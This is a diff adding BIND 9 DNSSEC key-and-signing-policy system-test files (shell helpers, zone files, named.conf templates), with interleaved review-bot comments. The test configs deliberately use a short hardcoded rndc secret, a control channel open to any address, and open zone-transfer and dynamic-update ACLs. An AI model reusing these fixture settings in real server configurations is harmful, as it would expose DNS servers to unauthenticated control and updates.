+check_subdomain() { + _qtype="A" + n=$((n+1)) + echo_i "check ${_qtype} a.${ZONE} rrset is signed correctly for zone ${ZONE} ($n)" + ret=0 + _dig_with_opts "a.$ZONE" "@${SERVER}" $_qtype > "dig.out.$DIR.test$n" || _log_error "dig a.${ZONE} ${_qtype} failed" + grep "status: NOERROR" "dig.out.$DIR.test$n" > /dev/null || _log_error "mismatch status in DNS response" + grep "a.${ZONE}\..*${DEFAULT_TTL}.*IN.*${_qtype}.*10\.0\.0\.1" "dig.out.$DIR.test$n" > /dev/null || _log_error "missing a.${ZONE} ${_qtype} record in response" + lines=$(get_keys_which_signed $_qtype "dig.out.$DIR.test$n" | wc -l) + check_signatures $_qtype "dig.out.$DIR.test$n" "ZSK" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +# Check if "CDS/CDNSKEY Published" is logged. +check_cdslog() { + _dir=$1 + _zone=$2 + _key=$3 + + _alg=$(key_get $_key ALG_STR) + _id=$(key_get $_key ID) + + n=$((n+1)) + echo_i "check CDS/CDNSKEY publication is logged in ${_dir}/named.run for key ${_zone}/${_alg}/${_id} ($n)" + ret=0 + + grep "CDS for key ${_zone}/${_alg}/${_id} is now published" "${_dir}/named.run" > /dev/null || ret=1 + grep "CDNSKEY for key ${_zone}/${_alg}/${_id} is now published" "${_dir}/named.run" > /dev/null || ret=1 + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +# Tell named that the DS for the key in given zone has been seen in the +# parent (this does not actually has to be true, we just issue the command +# to make named believe it can continue with the rollover). 
+rndc_checkds() { + _server=$1 + _dir=$2 + _key=$3 + _when=$4 + _what=$5 + _zone=$6 + _view=$7 + + _keycmd="" + if [ "${_key}" != "-" ]; then + _keyid=$(key_get $_key ID) + _keycmd=" -key ${_keyid}" + fi + + _whencmd="" + if [ "${_when}" != "now" ]; then + _whencmd=" -when ${_when}" + fi + + n=$((n+1)) + echo_i "calling rndc dnssec -checkds${_keycmd}${_whencmd} ${_what} zone ${_zone} in ${_view} ($n)" + ret=0 + + _rndccmd $_server dnssec -checkds $_keycmd $_whencmd $_what $_zone in $_view > rndc.dnssec.checkds.out.$_zone.$n || _log_error "rndc dnssec -checkds${_keycmd}${_whencmd} ${_what} zone ${_zone} failed" + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +# Tell named to schedule a key rollover. +rndc_rollover() { + _server=$1 + _dir=$2 + _keyid=$3 + _when=$4 + _zone=$5 + _view=$6 + + _whencmd="" + if [ "${_when}" != "now" ]; then + _whencmd="-when ${_when}" + fi + + n=$((n+1)) + echo_i "calling rndc dnssec -rollover key ${_keyid} ${_whencmd} zone ${_zone} ($n)" + ret=0 + + _rndccmd $_server dnssec -rollover -key $_keyid $_whencmd $_zone in $_view > rndc.dnssec.rollover.out.$_zone.$n || _log_error "rndc dnssec -rollover (key ${_keyid} when ${_when}) zone ${_zone} failed" + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} diff --git a/bin/tests/system/kasp/README b/bin/tests/system/kasp/README new file mode 100644 index 0000000..96b0ef7 --- /dev/null +++ b/bin/tests/system/kasp/README 
@@ -0,0 +1,23 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+SPDX-License-Identifier: MPL-2.0
+
+This Source Code Form is subject to the terms of the Mozilla Public
+License, v. 2.0. If a copy of the MPL was not distributed with this
+file, you can obtain one at https://mozilla.org/MPL/2.0/.
+
+See the COPYRIGHT file distributed with this work for additional
+information regarding copyright ownership.
+
+The test setup for the KASP tests.
+
+ns1 is reserved for the root server.
+
+ns2 is running primary service for ns3.
+
+ns3 is an authoritative server for the various test domains.
+
+ns4 and ns5 are authoritative servers for various test domains related to views.
+
+ns6 is an authoritative server that tests changes in dnssec-policy (algorithm
+rollover).
diff --git a/bin/tests/system/kasp/clean.sh b/bin/tests/system/kasp/clean.sh
new file mode 100644
index 0000000..db264c2
--- /dev/null
+++ b/bin/tests/system/kasp/clean.sh
@@ -0,0 +1,36 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+set -e
+
+rm -f ./keygen.*
+rm -f ./K*.private ./K*.key ./K*.state ./K*.cmp
+rm -rf ./keys/
+rm -f dig.out* rrsig.out.* keyevent.out.* verify.out.* zone.out.*
+rm -f ns*/named.conf ns*/named.memstats ns*/named.run*
+rm -f ns*/named-fips.conf
+rm -f ns*/policies/*.conf
+rm -f ns*/*.jnl ns*/*.jbk
+rm -f ns*/K*.private ns*/K*.key ns*/K*.state
+rm -f ns*/dsset-* ns*/*.db ns*/*.db.signed
+rm -f ns*/keygen.out.* ns*/settime.out.* ns*/signer.out.*
+rm -f ns*/managed-keys.bind
+rm -f ns*/*.mkeys
+rm -f ns*/zones ns*/*.db.infile
+rm -f ns*/*.zsk1 ns*/*.zsk2
+rm -f ns3/legacy-keys.*
+rm -f *.created published.test* retired.test*
+rm -f rndc.dnssec.*.out.* rndc.zonestatus.out.*
+rm -f python.out.*
+rm -f *-supported.file
+rm -f created.key-* unused.key-*
diff --git a/bin/tests/system/kasp/kasp.conf b/bin/tests/system/kasp/kasp.conf
new file mode 100644
index 0000000..e7a2eab
--- /dev/null
+++ b/bin/tests/system/kasp/kasp.conf
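Review bot: Every `rm` pattern in clean.sh, including `rm -rf ./keys/` and the unprefixed globs `*.created` and `*-supported.file`, resolves against the caller's working directory, and the script never changes into its own directory. If the test runner always changes into the kasp directory before calling it this is harmless, but that is not visible in this hunk; a line such as `cd "$(dirname "$0")"` after `set -e` would make the cleanup independent of where it is invoked. The first three `rm` lines use a `./` prefix and the later ones do not, so writing `rm -f ./*.created` and `rm -f ./*-supported.file` would also keep the style consistent and stop a file name beginning with `-` from being read as an option.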
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * This is just a random selection of configuration options.
+ */
+
+dnssec-policy "kasp" {
+ dnskey-ttl 200;
+
+ keys {
+ csk key-directory lifetime P1Y algorithm 13;
+ ksk key-directory lifetime P1Y algorithm 8;
+ zsk key-directory lifetime P30D algorithm 8 2048;
+ zsk key-directory lifetime P6M algorithm 8 3072;
+ };
+};
diff --git a/bin/tests/system/kasp/ns2/named.conf.in b/bin/tests/system/kasp/ns2/named.conf.in
new file mode 100644
index 0000000..4b673c4
--- /dev/null
+++ b/bin/tests/system/kasp/ns2/named.conf.in
@@ -0,0 +1,61 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ allow-transfer { any; };
+ recursion no;
+ dnssec-policy "none";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+/* Inherit dnssec-policy (which is none) */
+
+zone "unsigned.tld" {
+ type primary;
+ file "unsigned.tld.db";
+};
+
+/* Override dnssec-policy */
+
+zone "signed.tld" {
+ type primary;
+ file "signed.tld.db";
+ dnssec-policy "default";
+ inline-signing yes;
+};
+
+/* Primary service for ns3 */
+
+zone "secondary.kasp" {
+ type primary;
+ file "secondary.kasp.db";
+ allow-transfer { 10.53.0.3; };
+ notify yes;
+};
diff --git a/bin/tests/system/kasp/ns2/secondary.kasp.db.in b/bin/tests/system/kasp/ns2/secondary.kasp.db.in
new file mode 100644
index 0000000..3c8d124
--- /dev/null
+++ b/bin/tests/system/kasp/ns2/secondary.kasp.db.in
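Review bot: The `key rndc_key` block in ns2/named.conf.in commits a short static secret (`secret "1234abcd8765";`) and the `controls` statement accepts it from `allow { any; }`, with nothing in the file marking this as a test-only fixture. Exposure appears to be limited by `listen-on { 10.53.0.2; };` and by the control channel being bound to the same address, but that relies on 10.53.0.2 being a host-local test address, which this hunk does not show. I would add a comment above the key, e.g. `/* Test fixture only: fixed rndc secret and open ACLs; do not reuse outside the system-test network. */`. The same remark covers the options-level `allow-transfer { any; };`, which `unsigned.tld` and `signed.tld` inherit while only `secondary.kasp` narrows it to 10.53.0.3.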
@@ -0,0 +1,29 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA secondary.kasp. hostmaster.kasp. (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns2
+ NS ns3
+ns2 A 10.53.0.2
+ns3 A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+c A 10.0.0.3
+
diff --git a/bin/tests/system/kasp/ns2/secondary.kasp.db.in2 b/bin/tests/system/kasp/ns2/secondary.kasp.db.in2
new file mode 100644
index 0000000..9289831
--- /dev/null
+++ b/bin/tests/system/kasp/ns2/secondary.kasp.db.in2
@@ -0,0 +1,30 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA secondary.kasp. hostmaster.kasp. (
+ 2 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns2
+ NS ns3
+ns2 A 10.53.0.2
+ns3 A 10.53.0.3
+
+a A 10.0.0.11
+b A 10.0.0.2
+c A 10.0.0.3
+d A 10.0.0.4
+
diff --git a/bin/tests/system/kasp/ns2/setup.sh b/bin/tests/system/kasp/ns2/setup.sh
new file mode 100644
index 0000000..3890d52
--- /dev/null
+++ b/bin/tests/system/kasp/ns2/setup.sh
@@ -0,0 +1,35 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+echo_i "ns2/setup.sh"
+
+zone="secondary.kasp"
+echo_i "setting up zone: $zone"
+zonefile="${zone}.db"
+infile="${zonefile}.in"
+cp $infile $zonefile
+
+zone="signed.tld"
+echo_i "setting up zone: $zone"
+zonefile="${zone}.db"
+infile="template.tld.db.in"
+cp $infile $zonefile
+
+zone="unsigned.tld"
+echo_i "setting up zone: $zone"
+zonefile="${zone}.db"
+infile="template.tld.db.in"
+cp $infile $zonefile
diff --git a/bin/tests/system/kasp/ns2/template.tld.db.in b/bin/tests/system/kasp/ns2/template.tld.db.in
new file mode 100644
index 0000000..400dc34
--- /dev/null
+++ b/bin/tests/system/kasp/ns2/template.tld.db.in
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA secondary.kasp. hostmaster.kasp. (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns2
+ns2 A 10.53.0.2
+
+a A 10.0.0.1
+b A 10.0.0.2
+c A 10.0.0.3
+
diff --git a/bin/tests/system/kasp/ns3/ed25519.conf b/bin/tests/system/kasp/ns3/ed25519.conf
new file mode 100644
index 0000000..999fa2f
--- /dev/null
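Review bot: The three `cp $infile $zonefile` lines in ns2/setup.sh leave both variables unquoted, unlike the `. "$SYSTEMTESTTOP/conf.sh"` line above them and the `cp template.db.in "$zonefile"` form used in ns3/setup.sh. The values are fixed strings here, so this is a style point rather than a defect, but `cp "$infile" "$zonefile"` keeps the script clean under the shellcheck directive it already carries. The three stanzas differ only in zone name and input file and could share a small helper, which would leave a single quoting site to get right.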
+++ b/bin/tests/system/kasp/ns3/ed25519.conf
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "ed25519" {
+ dnskey-ttl 1234;
+
+ keys {
+ ksk key-directory lifetime P10Y algorithm 15;
+ zsk key-directory lifetime P5Y algorithm 15;
+ zsk key-directory lifetime P1Y algorithm 15 256;
+ };
+};
+
+zone "ed25519.kasp" {
+ type primary;
+ file "ed25519.kasp.db";
+ inline-signing yes;
+ dnssec-policy "ed25519";
+};
diff --git a/bin/tests/system/kasp/ns3/ed448.conf b/bin/tests/system/kasp/ns3/ed448.conf
new file mode 100644
index 0000000..e9c8312
--- /dev/null
+++ b/bin/tests/system/kasp/ns3/ed448.conf
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "ed448" {
+ dnskey-ttl 1234;
+
+ keys {
+ ksk key-directory lifetime P10Y algorithm 16;
+ zsk key-directory lifetime P5Y algorithm 16;
+ zsk key-directory lifetime P1Y algorithm 16 456;
+ };
+};
+
+zone "ed448.kasp" {
+ type primary;
+ file "ed448.kasp.db";
+ inline-signing yes;
+ dnssec-policy "ed448";
+};
diff --git a/bin/tests/system/kasp/ns3/named-fips.conf.in b/bin/tests/system/kasp/ns3/named-fips.conf.in
new file mode 100644
index 0000000..b14b142
--- /dev/null
+++ b/bin/tests/system/kasp/ns3/named-fips.conf.in 
@@ -0,0 +1,519 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +include "policies/kasp.conf"; +include "policies/autosign.conf"; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; + dnssec-policy "rsasha256"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm @DEFAULT_HMAC@; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* Zones that are getting initially signed */ + +/* The default case: No keys created, using default policy. */ +zone "default.kasp" { + type primary; + file "default.kasp.db"; + inline-signing yes; + dnssec-policy "default"; +}; + +/* checkds: Zone with one KSK. */ +zone "checkds-ksk.kasp" { + type primary; + file "checkds-ksk.kasp.db"; + inline-signing yes; + dnssec-policy "checkds-ksk"; +}; + +/* checkds: Zone with two KSKs. */ +zone "checkds-doubleksk.kasp" { + type primary; + file "checkds-doubleksk.kasp.db"; + inline-signing yes; + dnssec-policy "checkds-doubleksk"; +}; + +/* checkds: Zone with one CSK. */ +zone "checkds-csk.kasp" { + type primary; + file "checkds-csk.kasp.db"; + inline-signing yes; + dnssec-policy "checkds-csk"; +}; + +/* Key lifetime unlimited. */ +zone "unlimited.kasp" { + type primary; + file "unlimited.kasp.db"; + inline-signing yes; + dnssec-policy "unlimited"; +}; + +/* Manual rollover. 
*/ +zone "manual-rollover.kasp" { + type primary; + file "manual-rollover.kasp.db"; + inline-signing yes; + dnssec-policy "manual-rollover"; +}; + +/* A zone that inherits dnssec-policy. */ +zone "inherit.kasp" { + type primary; + inline-signing yes; + file "inherit.kasp.db"; +}; + +/* A zone that overrides dnssec-policy. */ +zone "unsigned.kasp" { + type primary; + file "unsigned.kasp.db"; + inline-signing yes; + dnssec-policy "none"; +}; + +/* A zone that is initially set to insecure. */ +zone "insecure.kasp" { + type primary; + file "insecure.kasp.db"; + inline-signing yes; + dnssec-policy "insecure"; +}; + +/* A primary zone with dnssec-policy but keys already created. */ +zone "dnssec-keygen.kasp" { + type primary; + file "dnssec-keygen.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha256"; +}; + +/* A secondary zone with dnssec-policy. */ +zone "secondary.kasp" { + type secondary; + primaries { 10.53.0.2; }; + file "secondary.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha256"; +}; + +/* A dynamic zone with dnssec-policy. */ +zone "dynamic.kasp" { + type primary; + file "dynamic.kasp.db"; + dnssec-policy "default"; + allow-update { any; }; +}; + +/* A dynamic inline-signed zone with dnssec-policy. */ +zone "dynamic-inline-signing.kasp" { + type primary; + file "dynamic-inline-signing.kasp.db"; + dnssec-policy "default"; + allow-update { any; }; + inline-signing yes; +}; + +/* An inline-signed zone with dnssec-policy. */ +zone "inline-signing.kasp" { + type primary; + file "inline-signing.kasp.db"; + dnssec-policy "default"; + inline-signing yes; +}; + +/* + * A configured dnssec-policy but some keys already created. + */ +zone "some-keys.kasp" { + type primary; + file "some-keys.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha256"; +}; + +/* + * A configured dnssec-policy but some keys already in use. 
+ */ +zone "legacy-keys.kasp" { + type primary; + file "legacy-keys.kasp.db"; + inline-signing yes; + dnssec-policy "migrate-to-dnssec-policy"; +}; + +/* + * A configured dnssec-policy with (too) many keys pregenerated. + */ +zone "pregenerated.kasp" { + type primary; + file "pregenerated.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha256"; +}; + +/* + * A configured dnssec-policy with one rumoured key. + * Bugfix case for GL #1593. + */ +zone "rumoured.kasp" { + type primary; + file "rumoured.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha256"; +}; + +/* RFC 8901 Multi-signer Model 2. */ +zone "multisigner-model2.kasp" { + type primary; + file "multisigner-model2.kasp.db"; + dnssec-policy "multisigner-model2"; + allow-update { any; }; +}; + +/* + * Different algorithms. + */ +zone "rsasha256.kasp" { + type primary; + file "rsasha256.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha256"; +}; +zone "rsasha512.kasp" { + type primary; + file "rsasha512.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha512"; +}; +zone "ecdsa256.kasp" { + type primary; + file "ecdsa256.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa256"; +}; +zone "ecdsa384.kasp" { + type primary; + file "ecdsa384.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa384"; +}; + +/* + * Zone with too high TTL. + */ +zone "max-zone-ttl.kasp" { + type primary; + file "max-zone-ttl.kasp.db"; + inline-signing yes; + dnssec-policy "ttl"; +}; + +/* + * Zone for testing GL #2375: Three is a crowd. + */ +zone "three-is-a-crowd.kasp" { + type primary; + file "three-is-a-crowd.kasp.db"; + inline-signing yes; + /* Use same policy as KSK rollover test zones. */ + dnssec-policy "ksk-doubleksk"; +}; + +/* + * Zones in different signing states. + */ + +/* + * Zone that has expired signatures. + */ +zone "expired-sigs.autosign" { + type primary; + file "expired-sigs.autosign.db"; + inline-signing yes; + dnssec-policy "autosign"; +}; + +/* + * Zone that has valid, fresh signatures. 
+ */ +zone "fresh-sigs.autosign" { + type primary; + file "fresh-sigs.autosign.db"; + inline-signing yes; + dnssec-policy "autosign"; +}; + +/* + * Zone that has unfresh signatures. + */ +zone "unfresh-sigs.autosign" { + type primary; + file "unfresh-sigs.autosign.db"; + inline-signing yes; + dnssec-policy "autosign"; +}; + +/* + * Zone that has missing private KSK. + */ +zone "ksk-missing.autosign" { + type primary; + file "ksk-missing.autosign.db"; + inline-signing yes; + dnssec-policy "autosign"; +}; + +/* + * Zone that has missing private ZSK. + */ +zone "zsk-missing.autosign" { + type primary; + file "zsk-missing.autosign.db"; + inline-signing yes; + dnssec-policy "autosign"; +}; + +/* + * Zone that has inactive ZSK. + */ +zone "zsk-retired.autosign" { + type primary; + file "zsk-retired.autosign.db"; + inline-signing yes; + dnssec-policy "autosign"; +}; + +/* + * Zones for testing enabling DNSSEC. + */ +zone "step1.enable-dnssec.autosign" { + type primary; + file "step1.enable-dnssec.autosign.db"; + inline-signing yes; + dnssec-policy "enable-dnssec"; +}; +zone "step2.enable-dnssec.autosign" { + type primary; + file "step2.enable-dnssec.autosign.db"; + inline-signing yes; + dnssec-policy "enable-dnssec"; +}; +zone "step3.enable-dnssec.autosign" { + type primary; + file "step3.enable-dnssec.autosign.db"; + inline-signing yes; + dnssec-policy "enable-dnssec"; +}; +zone "step4.enable-dnssec.autosign" { + type primary; + file "step4.enable-dnssec.autosign.db"; + inline-signing yes; + dnssec-policy "enable-dnssec"; +}; + +/* + * Zones for testing ZSK Pre-Publication steps. 
+ */ +zone "step1.zsk-prepub.autosign" { + type primary; + file "step1.zsk-prepub.autosign.db"; + inline-signing yes; + dnssec-policy "zsk-prepub"; +}; +zone "step2.zsk-prepub.autosign" { + type primary; + file "step2.zsk-prepub.autosign.db"; + inline-signing yes; + dnssec-policy "zsk-prepub"; +}; +zone "step3.zsk-prepub.autosign" { + type primary; + file "step3.zsk-prepub.autosign.db"; + inline-signing yes; + dnssec-policy "zsk-prepub"; +}; +zone "step4.zsk-prepub.autosign" { + type primary; + file "step4.zsk-prepub.autosign.db"; + inline-signing yes; + dnssec-policy "zsk-prepub"; +}; +zone "step5.zsk-prepub.autosign" { + type primary; + file "step5.zsk-prepub.autosign.db"; + inline-signing yes; + dnssec-policy "zsk-prepub"; +}; +zone "step6.zsk-prepub.autosign" { + type primary; + file "step6.zsk-prepub.autosign.db"; + inline-signing yes; + dnssec-policy "zsk-prepub"; +}; + +/* + * Zones for testing KSK Double-KSK steps. + */ +zone "step1.ksk-doubleksk.autosign" { + type primary; + file "step1.ksk-doubleksk.autosign.db"; + inline-signing yes; + dnssec-policy "ksk-doubleksk"; +}; +zone "step2.ksk-doubleksk.autosign" { + type primary; + file "step2.ksk-doubleksk.autosign.db"; + inline-signing yes; + dnssec-policy "ksk-doubleksk"; +}; +zone "step3.ksk-doubleksk.autosign" { + type primary; + file "step3.ksk-doubleksk.autosign.db"; + inline-signing yes; + dnssec-policy "ksk-doubleksk"; +}; +zone "step4.ksk-doubleksk.autosign" { + type primary; + file "step4.ksk-doubleksk.autosign.db"; + inline-signing yes; + dnssec-policy "ksk-doubleksk"; +}; +zone "step5.ksk-doubleksk.autosign" { + type primary; + file "step5.ksk-doubleksk.autosign.db"; + inline-signing yes; + dnssec-policy "ksk-doubleksk"; +}; +zone "step6.ksk-doubleksk.autosign" { + type primary; + file "step6.ksk-doubleksk.autosign.db"; + inline-signing yes; + dnssec-policy "ksk-doubleksk"; +}; + +/* + * Zones for testing CSK rollover steps. 
+ */ +zone "step1.csk-roll.autosign" { + type primary; + file "step1.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; +zone "step2.csk-roll.autosign" { + type primary; + file "step2.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; +zone "step3.csk-roll.autosign" { + type primary; + file "step3.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; +zone "step4.csk-roll.autosign" { + type primary; + file "step4.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; +zone "step5.csk-roll.autosign" { + type primary; + file "step5.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; +zone "step6.csk-roll.autosign" { + type primary; + file "step6.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; +zone "step7.csk-roll.autosign" { + type primary; + file "step7.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; +zone "step8.csk-roll.autosign" { + type primary; + file "step8.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; + +zone "step1.csk-roll2.autosign" { + type primary; + file "step1.csk-roll2.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll2"; +}; +zone "step2.csk-roll2.autosign" { + type primary; + file "step2.csk-roll2.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll2"; +}; +zone "step3.csk-roll2.autosign" { + type primary; + file "step3.csk-roll2.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll2"; +}; +zone "step4.csk-roll2.autosign" { + type primary; + file "step4.csk-roll2.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll2"; +}; +zone "step5.csk-roll2.autosign" { + type primary; + file "step5.csk-roll2.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll2"; +}; +zone "step6.csk-roll2.autosign" { + type primary; + file "step6.csk-roll2.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll2"; +}; 
+zone "step7.csk-roll2.autosign" { + type primary; + file "step7.csk-roll2.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll2"; +}; diff --git a/bin/tests/system/kasp/ns3/named.conf.in b/bin/tests/system/kasp/ns3/named.conf.in new file mode 100644 index 0000000..92e007d --- /dev/null +++ b/bin/tests/system/kasp/ns3/named.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +include "named-fips.conf"; + +zone "rsasha1.kasp" { + type primary; + file "rsasha1.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha1"; +}; + +zone "rsasha1-nsec3.kasp" { + type primary; + file "rsasha1-nsec3.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha1-nsec3"; +}; diff --git a/bin/tests/system/kasp/ns3/policies/autosign.conf.in b/bin/tests/system/kasp/ns3/policies/autosign.conf.in new file mode 100644 index 0000000..5564ec5 --- /dev/null +++ b/bin/tests/system/kasp/ns3/policies/autosign.conf.in 
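Review bot: Three zones in ns3/named-fips.conf.in — `dynamic.kasp`, `dynamic-inline-signing.kasp` and `multisigner-model2.kasp` — set `allow-update { any; };`, which accepts unsigned dynamic updates from any source that can reach 10.53.0.3. If the test only sends updates from its own test addresses (not visible in this hunk), an address match list or a TSIG key would express that. Otherwise a comment on each zone such as `/* test-only: unauthenticated updates, server listens on the test address only */` would stop the stanza being copied into a real configuration. The `allow-transfer { any; };` line in the `options` block deserves the same comment.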
@@ -0,0 +1,133 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "autosign" {
+
+ signatures-refresh P1W;
+ signatures-validity P2W;
+ signatures-validity-dnskey P2W;
+
+ dnskey-ttl 300;
+
+ keys {
+ ksk key-directory lifetime P2Y algorithm @DEFAULT_ALGORITHM@;
+ zsk key-directory lifetime P1Y algorithm @DEFAULT_ALGORITHM@;
+ };
+};
+
+dnssec-policy "enable-dnssec" {
+
+ signatures-refresh P1W;
+ signatures-validity P2W;
+ signatures-validity-dnskey P2W;
+
+ dnskey-ttl 300;
